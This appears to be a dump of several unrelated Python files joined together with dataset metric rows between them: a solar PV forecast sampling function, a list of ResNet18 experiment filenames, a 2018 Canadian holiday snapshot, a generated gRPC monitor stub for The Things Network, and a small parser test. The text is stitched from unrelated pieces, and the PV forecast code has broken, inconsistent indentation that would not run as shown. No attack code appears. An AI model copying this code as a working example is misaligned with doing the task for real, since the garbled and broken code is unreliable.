## PV FORECAST ##
###############################################################################
def pv_fcst():
### VERSION 1 ###
if pm.V_FCST == 1:
nSamples = 10000 # define number of samples
        # forecast; change the angles to extend the solar hours
if pm.FCSTCASE[0] == 'summer':
pvMuRaw = 0.57*np.sin(np.linspace(-np.deg2rad(40),\
np.pi+np.deg2rad(55),\
int(24/pm.TIMESTEP)))
elif pm.FCSTCASE[0] == 'winter':
pvMuRaw = 0.35*np.sin(np.linspace(-np.deg2rad(65),\
np.pi+np.deg2rad(85),\
int(24/pm.TIMESTEP)))
# remove very small values
pvMuRaw[pvMuRaw < 1e-5] = 0
# standard deviation
pvSigmaRaw = 0.25*np.sin(np.linspace(-np.deg2rad(35),\
np.pi+np.deg2rad(55),\
int(24/pm.TIMESTEP)))*pvMuRaw
pvSigmaRaw[pvSigmaRaw < 1e-5] = 0
# daily profile according to mean and standard deviation above
pvDaily = np.array([np.random.normal(pvMuRaw[i],pvSigmaRaw[i],nSamples)\
for i in range(int(24/pm.TIMESTEP))])
# remove samples with forecast > 1
pvDailyFiltered = np.zeros((int(24/pm.TIMESTEP),1))
        for i in range(nSamples):
            # discard any sample whose forecast exceeds the physical maximum of 1
            if np.any(pvDaily[:,i] > 1):
                continue
            pvDailyFiltered = np.append(pvDailyFiltered,\
                                        pvDaily[:,i]\
                                        .reshape(int(24/pm.TIMESTEP),1),axis=1)
### TAKE VALUES FROM 12:00 +- T/2 ###
t_middle = 1/pm.TIMESTEP*12
t_start = int(t_middle - pm.T/2)
t_end = int(t_middle + pm.T/2)
# average PV production
pvMu = pvMuRaw[t_start:t_end]
pvSigma = pvSigmaRaw[t_start:t_end]
# for pkl export
dataFcst = pvDailyFiltered[t_start:t_end,1:]
###################################################################
## OUT-OF-SAMPLE ANALYSIS ##
###################################################################
pvMC = np.array([np.random.normal(pvMuRaw[i],pvSigmaRaw[i],nSamples)\
for i in range(int(24/pm.TIMESTEP))])
# remove samples with forecast > 1
pvMCFiltered = np.zeros((int(24/pm.TIMESTEP),1))
        for i in range(nSamples):
            # discard any sample whose forecast exceeds the physical maximum of 1
            # (note: append from pvMC, not pvDaily, since pvMC is being filtered)
            if np.any(pvMC[:,i] > 1):
                continue
            pvMCFiltered = np.append(pvMCFiltered,\
                                     pvMC[:,i]\
                                     .reshape(int(24/pm.TIMESTEP),1),axis=1)
### TAKE VALUES FROM 12:00 +- T/2 ###
t_middle = 1/pm.TIMESTEP*12
t_start = int(t_middle - pm.T/2)
t_end = int(t_middle + pm.T/2)
dataMC = pvMCFiltered[t_start:t_end,1:]
###################################################################
## EXPORT PKL ##
###################################################################
export = [pvMu, pvSigma, dataMC, dataFcst]
fcstFile = 'src/fcst/forecastPV_v%s_%s_t%s.pkl'\
%(pm.V_FCST,pm.FCSTCASE[0],pm.T)
output = open(fcstFile, 'wb') # create output file
pkl.dump(export, output) # write data to output file
output.close() # close output file
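        # Illustrative aside, not part of the original script: the per-sample
        # rejection loop above can be vectorized with a boolean column mask.
        # The sketch below uses made-up stand-ins (n_steps, n_samples, pv_daily)
        # for the values derived from param.py.
        #
        # ```python
        # import numpy as np
        #
        # # Assumed dimensions, standing in for int(24/pm.TIMESTEP) and nSamples.
        # n_steps, n_samples = 24, 1000
        # rng = np.random.default_rng(0)
        # pv_daily = rng.normal(0.5, 0.3, size=(n_steps, n_samples))
        #
        # # Keep only the columns (samples) whose every value stays <= 1.
        # keep = ~np.any(pv_daily > 1, axis=0)
        # pv_filtered = pv_daily[:, keep]
        #
        # assert not np.any(pv_filtered > 1)
        # ```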
### VERSION 2 ###
    elif pm.V_FCST == 2:
nSamples = 10000 # define number of samples
        # forecast; change the angles to extend the solar hours
if pm.FCSTCASE[0] == 'summer':
pvMuRaw = 0.57*np.sin(np.linspace(-np.deg2rad(40),\
np.pi+np.deg2rad(55),\
int(24/pm.TIMESTEP)))
elif pm.FCSTCASE[0] == 'winter':
pvMuRaw = 0.35*np.sin(np.linspace(-np.deg2rad(65),\
np.pi+np.deg2rad(85),\
int(24/pm.TIMESTEP)))
# remove very small values
pvMuRaw[pvMuRaw < 1e-5] = 0
# standard deviation
pvSigmaRaw = 0.25*np.sin(np.linspace(-np.deg2rad(35),\
np.pi+np.deg2rad(55),\
int(24/pm.TIMESTEP)))*pvMuRaw
pvSigmaRaw[pvSigmaRaw < 1e-5] = 0
# daily profile according to mean and standard deviation above
pvDaily = np.array([np.random.normal(pvMuRaw[i],pvSigmaRaw[i],nSamples)\
for i in range(int(24/pm.TIMESTEP))])
# remove samples with forecast > 1
pvDailyFiltered = np.zeros((int(24/pm.TIMESTEP),1))
        for i in range(nSamples):
            # discard any sample whose forecast exceeds the physical maximum of 1
            if np.any(pvDaily[:,i] > 1):
                continue
            pvDailyFiltered = np.append(pvDailyFiltered,\
                                        pvDaily[:,i]\
                                        .reshape(int(24/pm.TIMESTEP),1),axis=1)
### TAKE VALUES FROM 12:00 +- T/2 ###
t_middle = 1/pm.TIMESTEP*12
t_start = int(t_middle - pm.T/2)
t_end = int(t_middle + pm.T/2)
# average PV production
pvMu = pvMuRaw[t_start:t_end]
pvSigma = pvSigmaRaw[t_start:t_end]
# for pkl export
dataFcst = pvDailyFiltered[t_start:t_end,1:]
###################################################################
## IN-SAMPLE ANALYSIS ##
###################################################################
dataMC = dataFcst
###################################################################
## EXPORT PKL ##
###################################################################
export = [pvMu, pvSigma, dataMC, dataFcst]
fcstFile = 'src/fcst/forecastPV_v%s_%s_t%s.pkl'\
%(pm.V_FCST,pm.FCSTCASE[0],pm.T)
output = open(fcstFile, 'wb') # create output file
pkl.dump(export, output) # write data to output file
output.close() # close output file
return pvMu, pvSigma, dataMC, dataFcst | 39.402116 | 81 | 0.399758 | 701 | 7,447 | 4.189729 | 0.18117 | 0.061287 | 0.035751 | 0.076609 | 0.860061 | 0.856316 | 0.856316 | 0.856316 | 0.856316 | 0.856316 | 0 | 0.036695 | 0.388881 | 7,447 | 189 | 82 | 39.402116 | 0.608657 | 0.143011 | 0 | 0.863158 | 0 | 0 | 0.0183 | 0.012962 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010526 | false | 0 | 0.042105 | 0 | 0.063158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2452dbc0e06041d5e4575c41990fd7047267ce19 | 439 | py | Python | results/resnet18.py | piyushkaul/information_geometry | 56b2800e6e8b8d5c6a9a02a42a79ee86ab613d8c | [
"MIT"
] | null | null | null | results/resnet18.py | piyushkaul/information_geometry | 56b2800e6e8b8d5c6a9a02a42a79ee86ab613d8c | [
"MIT"
] | null | null | null | results/resnet18.py | piyushkaul/information_geometry | 56b2800e6e8b8d5c6a9a02a42a79ee86ab613d8c | [
"MIT"
] | null | null | null | resnet18=[
    '2021_03_12_10_43_39_adam_ngd_lr_0.01_gamma_0.8_frac_1.0_cifar10_direct_inv_period_50_proj_period_50_model_resnet18_epochs_15_batch_size_64txt',
    '2021_03_12_15_13_20_adam_ngd_lr_0.01_gamma_0.8_frac_0.95_cifar10_direct_inv_period_50_proj_period_50_model_resnet18_epochs_15_batch_size_64txt',
    '2021_03_12_18_44_47_sgd_lr_0.1_gamma_0.8_frac_1.0_cifar10_direct_inv_period_50_proj_period_50_model_resnet18_epochs_15_batch_size_64txt']
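# Worth noting when maintaining lists of long filename strings like the one
# above: adjacent Python string literals concatenate implicitly, so a missing
# comma silently merges two entries into a single element. A self-contained
# illustration (hypothetical filenames):
#
# ```python
# # A missing comma between adjacent literals merges them into one element.
# broken = [
#     'run_a.txt'
#     'run_b.txt'  # no comma above, so this joins the previous literal
# ]
# fixed = ['run_a.txt', 'run_b.txt']
#
# assert broken == ['run_a.txtrun_b.txt']
# assert len(fixed) == 2
# ```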
| 87.8 | 144 | 0.949886 | 96 | 439 | 3.479167 | 0.364583 | 0.143713 | 0.071856 | 0.098802 | 0.868263 | 0.868263 | 0.868263 | 0.868263 | 0.868263 | 0.763473 | 0 | 0.232184 | 0.009112 | 439 | 4 | 145 | 109.75 | 0.535632 | 0 | 0 | 0 | 0 | 0 | 0.952164 | 0.952164 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
2468a4e2c2394f509cb0aa77def5d3e737161d32 | 8,267 | py | Python | tests/snapshots/snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2018] 1.py | gour/holidata | 89c7323f9c5345a3ecbf5cd5a835b0e08cfebc13 | [
"MIT"
] | 32 | 2019-04-12T08:01:34.000Z | 2022-02-28T04:41:50.000Z | tests/snapshots/snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2018] 1.py | gour/holidata | 89c7323f9c5345a3ecbf5cd5a835b0e08cfebc13 | [
"MIT"
] | 74 | 2019-07-09T16:35:20.000Z | 2022-03-09T16:41:34.000Z | tests/snapshots/snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2018] 1.py | gour/holidata | 89c7323f9c5345a3ecbf5cd5a835b0e08cfebc13 | [
"MIT"
] | 20 | 2019-01-28T07:41:02.000Z | 2022-02-16T02:38:57.000Z | [
{
'date': '2018-01-01',
'description': "New Year's Day",
'locale': 'en-CA',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2018-02-19',
'description': 'Family Day',
'locale': 'en-CA',
'notes': '',
'region': 'AB',
'type': 'V'
},
{
'date': '2018-02-19',
'description': 'Family Day',
'locale': 'en-CA',
'notes': '',
'region': 'ON',
'type': 'V'
},
{
'date': '2018-02-19',
'description': 'Family Day',
'locale': 'en-CA',
'notes': '',
'region': 'SK',
'type': 'V'
},
{
'date': '2018-02-19',
'description': 'Family Day',
'locale': 'en-CA',
'notes': '',
'region': 'NB',
'type': 'V'
},
{
'date': '2018-02-19',
'description': 'Louis Riel Day',
'locale': 'en-CA',
'notes': '',
'region': 'MB',
'type': 'V'
},
{
'date': '2018-02-19',
'description': 'Islander Day',
'locale': 'en-CA',
'notes': '',
'region': 'PE',
'type': 'V'
},
{
'date': '2018-03-30',
'description': 'Good Friday',
'locale': 'en-CA',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2018-04-02',
'description': 'Easter Monday',
'locale': 'en-CA',
'notes': '',
'region': 'AB',
'type': 'RV'
},
{
'date': '2018-04-02',
'description': 'Easter Monday',
'locale': 'en-CA',
'notes': '',
'region': 'PE',
'type': 'RV'
},
{
'date': '2018-04-02',
'description': 'Easter Monday',
'locale': 'en-CA',
'notes': '',
'region': 'QC',
'type': 'RV'
},
{
'date': '2018-05-21',
'description': "National Patriots' Day",
'locale': 'en-CA',
'notes': '',
'region': 'QC',
'type': 'V'
},
{
'date': '2018-05-21',
'description': 'Victoria Day',
'locale': 'en-CA',
'notes': '',
'region': 'AB',
'type': 'V'
},
{
'date': '2018-05-21',
'description': 'Victoria Day',
'locale': 'en-CA',
'notes': '',
'region': 'BC',
'type': 'V'
},
{
'date': '2018-05-21',
'description': 'Victoria Day',
'locale': 'en-CA',
'notes': '',
'region': 'MB',
'type': 'V'
},
{
'date': '2018-05-21',
'description': 'Victoria Day',
'locale': 'en-CA',
'notes': '',
'region': 'NS',
'type': 'V'
},
{
'date': '2018-05-21',
'description': 'Victoria Day',
'locale': 'en-CA',
'notes': '',
'region': 'ON',
'type': 'V'
},
{
'date': '2018-05-21',
'description': 'Victoria Day',
'locale': 'en-CA',
'notes': '',
'region': 'SK',
'type': 'V'
},
{
'date': '2018-05-21',
'description': 'Victoria Day',
'locale': 'en-CA',
'notes': '',
'region': 'NT',
'type': 'V'
},
{
'date': '2018-05-21',
'description': 'Victoria Day',
'locale': 'en-CA',
'notes': '',
'region': 'NU',
'type': 'V'
},
{
'date': '2018-05-21',
'description': 'Victoria Day',
'locale': 'en-CA',
'notes': '',
'region': 'YT',
'type': 'V'
},
{
'date': '2018-06-24',
'description': 'National Holiday',
'locale': 'en-CA',
'notes': '',
'region': 'QC',
'type': 'F'
},
{
'date': '2018-07-01',
'description': 'Canada Day',
'locale': 'en-CA',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2018-08-06',
'description': 'August Civic Holiday',
'locale': 'en-CA',
'notes': '',
'region': 'NT',
'type': 'V'
},
{
'date': '2018-08-06',
'description': 'August Civic Holiday',
'locale': 'en-CA',
'notes': '',
'region': 'NU',
'type': 'V'
},
{
'date': '2018-08-06',
'description': 'Saskatchewan Day',
'locale': 'en-CA',
'notes': '',
'region': 'SK',
'type': 'V'
},
{
'date': '2018-08-06',
'description': 'Heritage Day',
'locale': 'en-CA',
'notes': '',
'region': 'AB',
'type': 'V'
},
{
'date': '2018-08-06',
'description': 'Heritage Day',
'locale': 'en-CA',
'notes': '',
'region': 'NS',
'type': 'V'
},
{
'date': '2018-08-06',
'description': 'New Brunswick Day',
'locale': 'en-CA',
'notes': '',
'region': 'NB',
'type': 'V'
},
{
'date': '2018-09-03',
'description': 'Labour Day',
'locale': 'en-CA',
'notes': '',
'region': '',
'type': 'NV'
},
{
'date': '2018-10-08',
'description': 'Thanksgiving Day',
'locale': 'en-CA',
'notes': '',
'region': 'AB',
'type': 'V'
},
{
'date': '2018-10-08',
'description': 'Thanksgiving Day',
'locale': 'en-CA',
'notes': '',
'region': 'BC',
'type': 'V'
},
{
'date': '2018-10-08',
'description': 'Thanksgiving Day',
'locale': 'en-CA',
'notes': '',
'region': 'MB',
'type': 'V'
},
{
'date': '2018-10-08',
'description': 'Thanksgiving Day',
'locale': 'en-CA',
'notes': '',
'region': 'NL',
'type': 'V'
},
{
'date': '2018-10-08',
'description': 'Thanksgiving Day',
'locale': 'en-CA',
'notes': '',
'region': 'ON',
'type': 'V'
},
{
'date': '2018-10-08',
'description': 'Thanksgiving Day',
'locale': 'en-CA',
'notes': '',
'region': 'QC',
'type': 'V'
},
{
'date': '2018-10-08',
'description': 'Thanksgiving Day',
'locale': 'en-CA',
'notes': '',
'region': 'SK',
'type': 'V'
},
{
'date': '2018-10-08',
'description': 'Thanksgiving Day',
'locale': 'en-CA',
'notes': '',
'region': 'NT',
'type': 'V'
},
{
'date': '2018-10-08',
'description': 'Thanksgiving Day',
'locale': 'en-CA',
'notes': '',
'region': 'NU',
'type': 'V'
},
{
'date': '2018-10-08',
'description': 'Thanksgiving Day',
'locale': 'en-CA',
'notes': '',
'region': 'YT',
'type': 'V'
},
{
'date': '2018-11-11',
'description': 'Remembrance Day',
'locale': 'en-CA',
'notes': '',
'region': 'AB',
'type': 'F'
},
{
'date': '2018-11-11',
'description': 'Remembrance Day',
'locale': 'en-CA',
'notes': '',
'region': 'BC',
'type': 'F'
},
{
'date': '2018-11-11',
'description': 'Remembrance Day',
'locale': 'en-CA',
'notes': '',
'region': 'NB',
'type': 'F'
},
{
'date': '2018-11-11',
'description': 'Remembrance Day',
'locale': 'en-CA',
'notes': '',
'region': 'NL',
'type': 'F'
},
{
'date': '2018-11-11',
'description': 'Remembrance Day',
'locale': 'en-CA',
'notes': '',
'region': 'NT',
'type': 'F'
},
{
'date': '2018-12-25',
'description': 'Christmas Day',
'locale': 'en-CA',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2018-12-26',
'description': 'Boxing Day',
'locale': 'en-CA',
'notes': '',
'region': '',
'type': 'NRF'
}
] | 21.87037 | 48 | 0.362042 | 706 | 8,267 | 4.239377 | 0.104816 | 0.125626 | 0.157033 | 0.23555 | 0.91146 | 0.903775 | 0.892082 | 0.841296 | 0.815236 | 0.815236 | 0 | 0.076376 | 0.4045 | 8,267 | 378 | 49 | 21.87037 | 0.531586 | 0 | 0 | 0.690476 | 0 | 0 | 0.385704 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
302e8293d15aef4573b02f8959843983c1b9fc1b | 11,552 | py | Python | theBroker/venv/Lib/site-packages/ttn/github_com/TheThingsNetwork/api/monitor/monitor_pb2_grpc.py | emirgo/WeatherStation | f0f8c3464470991fc962d83cea20f3bcfd6a04b6 | [
"MIT"
] | 32 | 2017-11-01T16:03:48.000Z | 2021-11-16T12:35:34.000Z | theBroker/venv/Lib/site-packages/ttn/github_com/TheThingsNetwork/api/monitor/monitor_pb2_grpc.py | emirgo/WeatherStation | f0f8c3464470991fc962d83cea20f3bcfd6a04b6 | [
"MIT"
] | 28 | 2017-11-20T09:45:59.000Z | 2021-12-14T09:31:24.000Z | theBroker/venv/Lib/site-packages/ttn/github_com/TheThingsNetwork/api/monitor/monitor_pb2_grpc.py | emirgo/WeatherStation | f0f8c3464470991fc962d83cea20f3bcfd6a04b6 | [
"MIT"
] | 22 | 2017-11-03T10:21:50.000Z | 2021-04-08T05:20:51.000Z | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from ttn.github_com.TheThingsNetwork.api.broker import broker_pb2 as github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2
from ttn.github_com.TheThingsNetwork.api.gateway import gateway_pb2 as github__com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2
from ttn.github_com.TheThingsNetwork.api.handler import handler_pb2 as github__com_dot_TheThingsNetwork_dot_api_dot_handler_dot_handler__pb2
from ttn.github_com.TheThingsNetwork.api.networkserver import networkserver_pb2 as github__com_dot_TheThingsNetwork_dot_api_dot_networkserver_dot_networkserver__pb2
from ttn.github_com.TheThingsNetwork.api.router import router_pb2 as github__com_dot_TheThingsNetwork_dot_api_dot_router_dot_router__pb2
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
class MonitorStub(object):
# missing associated documentation comment in .proto file
pass
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.RouterStatus = channel.stream_unary(
'/monitor.Monitor/RouterStatus',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_router_dot_router__pb2.Status.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.GatewayStatus = channel.stream_unary(
'/monitor.Monitor/GatewayStatus',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2.Status.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.GatewayUplink = channel.stream_unary(
'/monitor.Monitor/GatewayUplink',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_router_dot_router__pb2.UplinkMessage.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.GatewayDownlink = channel.stream_unary(
'/monitor.Monitor/GatewayDownlink',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_router_dot_router__pb2.DownlinkMessage.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.BrokerStatus = channel.stream_unary(
'/monitor.Monitor/BrokerStatus',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2.Status.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.BrokerUplink = channel.stream_unary(
'/monitor.Monitor/BrokerUplink',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2.DeduplicatedUplinkMessage.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.BrokerDownlink = channel.stream_unary(
'/monitor.Monitor/BrokerDownlink',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2.DownlinkMessage.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.HandlerStatus = channel.stream_unary(
'/monitor.Monitor/HandlerStatus',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_handler_dot_handler__pb2.Status.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.HandlerUplink = channel.stream_unary(
'/monitor.Monitor/HandlerUplink',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2.DeduplicatedUplinkMessage.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.HandlerDownlink = channel.stream_unary(
'/monitor.Monitor/HandlerDownlink',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2.DownlinkMessage.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.NetworkServerStatus = channel.stream_unary(
'/monitor.Monitor/NetworkServerStatus',
request_serializer=github__com_dot_TheThingsNetwork_dot_api_dot_networkserver_dot_networkserver__pb2.Status.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class MonitorServicer(object):
# missing associated documentation comment in .proto file
pass
def RouterStatus(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GatewayStatus(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GatewayUplink(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GatewayDownlink(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def BrokerStatus(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def BrokerUplink(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def BrokerDownlink(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def HandlerStatus(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def HandlerUplink(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def HandlerDownlink(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def NetworkServerStatus(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_MonitorServicer_to_server(servicer, server):
rpc_method_handlers = {
'RouterStatus': grpc.stream_unary_rpc_method_handler(
servicer.RouterStatus,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_router_dot_router__pb2.Status.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'GatewayStatus': grpc.stream_unary_rpc_method_handler(
servicer.GatewayStatus,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_gateway_dot_gateway__pb2.Status.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'GatewayUplink': grpc.stream_unary_rpc_method_handler(
servicer.GatewayUplink,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_router_dot_router__pb2.UplinkMessage.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'GatewayDownlink': grpc.stream_unary_rpc_method_handler(
servicer.GatewayDownlink,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_router_dot_router__pb2.DownlinkMessage.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'BrokerStatus': grpc.stream_unary_rpc_method_handler(
servicer.BrokerStatus,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2.Status.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'BrokerUplink': grpc.stream_unary_rpc_method_handler(
servicer.BrokerUplink,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2.DeduplicatedUplinkMessage.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'BrokerDownlink': grpc.stream_unary_rpc_method_handler(
servicer.BrokerDownlink,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2.DownlinkMessage.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'HandlerStatus': grpc.stream_unary_rpc_method_handler(
servicer.HandlerStatus,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_handler_dot_handler__pb2.Status.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'HandlerUplink': grpc.stream_unary_rpc_method_handler(
servicer.HandlerUplink,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2.DeduplicatedUplinkMessage.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'HandlerDownlink': grpc.stream_unary_rpc_method_handler(
servicer.HandlerDownlink,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_broker_dot_broker__pb2.DownlinkMessage.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'NetworkServerStatus': grpc.stream_unary_rpc_method_handler(
servicer.NetworkServerStatus,
request_deserializer=github__com_dot_TheThingsNetwork_dot_api_dot_networkserver_dot_networkserver__pb2.Status.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'monitor.Monitor', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
| 52.036036 | 164 | 0.796659 | 1,275 | 11,552 | 6.728627 | 0.070588 | 0.03357 | 0.037767 | 0.088122 | 0.857093 | 0.816062 | 0.808719 | 0.742394 | 0.742394 | 0.726891 | 0 | 0.005644 | 0.141101 | 11,552 | 221 | 165 | 52.271493 | 0.859 | 0.072974 | 0 | 0.47541 | 1 | 0 | 0.094596 | 0.031657 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071038 | false | 0.071038 | 0.038251 | 0 | 0.120219 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
062d997af3c51ad84eb97a38ca2da6ebb72da0ba | 133 | py | Python | tests/parser/choice.43.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/choice.43.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/choice.43.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | input = """
a :- not b.
b :- not a.
c :- a.
d :- not c.
"""
output = """
a :- not b.
b :- not a.
c :- a.
d :- not c.
"""
| 8.866667 | 12 | 0.338346 | 24 | 133 | 1.875 | 0.291667 | 0.177778 | 0.222222 | 0.266667 | 0.755556 | 0.755556 | 0.755556 | 0.755556 | 0.755556 | 0.755556 | 0 | 0 | 0.37594 | 133 | 14 | 13 | 9.5 | 0.542169 | 0 | 0 | 0.833333 | 0 | 0 | 0.747967 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
23489ff9f548a4e60cb2ea9155f3abccfac001c1 | 2,317 | py | Python | FishboneMoncriefID/tests/trusted_values_dict.py | ksible/nrpytutorial | 4ca6e9da22def2a9c9bcbcad75847fd1db159f4b | [
"BSD-2-Clause"
